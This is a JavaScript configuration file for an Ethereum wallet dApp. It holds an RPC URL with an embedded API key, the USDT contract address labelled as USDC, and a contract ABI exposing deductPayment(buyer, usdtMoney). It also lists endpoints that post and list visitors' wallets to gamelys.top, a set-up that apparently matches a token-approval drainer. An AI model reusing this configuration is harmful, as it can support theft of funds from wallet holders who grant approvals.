export const config = {
  RPC_URL: "https://eth-mainnet.g.alchemy.com/v2/FYCUuLVDHgA9giR3K5zl1",
  usdcContractAddress: "0xdAC17F958D2ee523a2206206994597C13D831ec7",
  //yourTradingContractAddress:"0xED0cD7Ff0f058aA3076B5c7c0Aa91d696E62e912",
  yourTradingContractAddress:"0x910B63a43abaC4ff261dCE629D2b89b01989fCBD",
  projectId: "8500dca7720e08a63ec55509624f9aba",
  myWalletAddress: "0xD0C7997894Cf75B62d0039Af113B0654F9E6A498", // 替换为你的钱包地址
  metadata: {
    name: "My Website",
    description: "My Website description",
    url: "https://ig178.com", // 必须是有效的 URL
    icons: ["https://gamelys.top/app/public/images/logo.png"],
  },
  tradingContractAbi: [
    // 我們需要調用 deductPayment，所以必須包含它
    "function deductPayment(address buyer,uint256 usdtMoney) public",
    "function withdraw() public",
  ],
  erc20Abi: [
    "function approve(address spender, uint256 amount) returns (bool)","function balanceOf(address owner) view returns (uint256)","function transfer(address to, uint256 amount) returns (bool)"
  ],
  USDT_ABI : ["function balanceOf(address account) view returns (uint256)"],
  postWalletReal:"https://gamelys.top/api/tools/postWalletReal", 
  getWalletReal:"https://gamelys.top/api/tools/getWalletReal",
  getWalletnum:"https://gamelys.top/api/tools/getWalletnum",
  getWalletlist:"https://gamelys.top/api/tools/getWalletlist",
  textdapp:"https://gamelys.top/api/text/list?type=dapp",
  getWalletRealInfo:"https://gamelys.top/api/tools/getWalletRealInfo",
  goLogin:"https://ig178.com/pages/welcome/login",
  // postWalletReal:"https://gamelys.top/api/tools/postWalletReal",
};
